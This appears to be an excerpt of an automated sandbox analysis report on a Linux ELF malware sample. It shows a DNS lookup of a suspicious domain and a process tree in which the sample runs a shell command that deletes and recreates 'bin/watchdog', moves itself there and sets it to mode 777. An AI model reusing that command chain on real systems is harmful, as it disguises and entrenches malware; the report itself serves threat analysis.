                  Mar 20, 2023 16:00:49.369513035 CET8.8.8.8192.168.2.230xb38eNo error (0)j.xnyidc.top156.224.24.249A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/tmp/lD25Z9LfKe.elf
                  Arguments:/tmp/lD25Z9LfKe.elf
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/tmp/lD25Z9LfKe.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/usr/bin/rm
                  Arguments:rm -rf bin/watchdog
                  File size:72056 bytes
                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/usr/bin/mkdir
                  Arguments:mkdir bin
                  File size:88408 bytes
                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/usr/bin/mv
                  Arguments:mv /tmp/lD25Z9LfKe.elf bin/watchdog
                  File size:149888 bytes
                  MD5 hash:504f0590fa482d4da070a702260e3716

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/bin/sh
                  Arguments:n/a
                  File size:129816 bytes
                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/usr/bin/chmod
                  Arguments:chmod 777 bin/watchdog
                  File size:63864 bytes
                  MD5 hash:739483b900c045ae1374d6f53a86a279

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/tmp/lD25Z9LfKe.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/tmp/lD25Z9LfKe.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6

                  General

                  Start time:15:59:45
                  Start date:20/03/2023
                  Path:/tmp/lD25Z9LfKe.elf
                  Arguments:n/a
                  File size:5388968 bytes
                  MD5 hash:ae65271c943d3451b7f026d1fadccea6